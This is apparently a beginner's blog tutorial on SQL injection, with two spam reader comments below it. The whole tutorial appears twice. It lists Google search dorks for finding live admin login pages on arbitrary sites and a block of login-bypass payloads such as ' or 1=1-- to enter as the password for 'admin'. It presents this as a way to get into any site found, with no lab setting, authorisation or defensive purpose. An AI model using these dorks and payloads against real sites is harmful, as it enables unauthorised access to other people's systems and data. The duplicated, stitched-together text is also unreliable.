03:35
SQL INJECTION TUTORIAL FOR BEGINNERS
What is SQL injection?
2; SQL injection is a code injection technique that exploits a security vulnerability occurring in the databaselayer of an application.
3 First let us find out our target for SQL injection.
4 Open up Google and type in "inurl:admin.asp" and then press Enter.
5 You will get list of sites like "http//www.mysite.com/admin.asp, just click on any such site
6 And the other keywords to find the target are
Code:
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
Once its opened it will promt for username and pwd.
8 We always give the username as "admin" and password we type our sql injection as follows.
Code:
' or '1'='1
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
then click summit and your in.
Note: Wont work on all site's
2; SQL injection is a code injection technique that exploits a security vulnerability occurring in the databaselayer of an application.
3 First let us find out our target for SQL injection.
4 Open up Google and type in "inurl:admin.asp" and then press Enter.
5 You will get list of sites like "http//www.mysite.com/admin.asp, just click on any such site
6 And the other keywords to find the target are
Code:
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
Once its opened it will promt for username and pwd.
8 We always give the username as "admin" and password we type our sql injection as follows.
Code:
' or '1'='1
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
then click summit and your in.
Note: Wont work on all site's
This is such an amazing blog.
ReplyDeleteI was surfing the Internet for information and came across your blog. I am impressed by the information you have on this blog. It shows how well you understand this subject. IoT data plan
ReplyDelete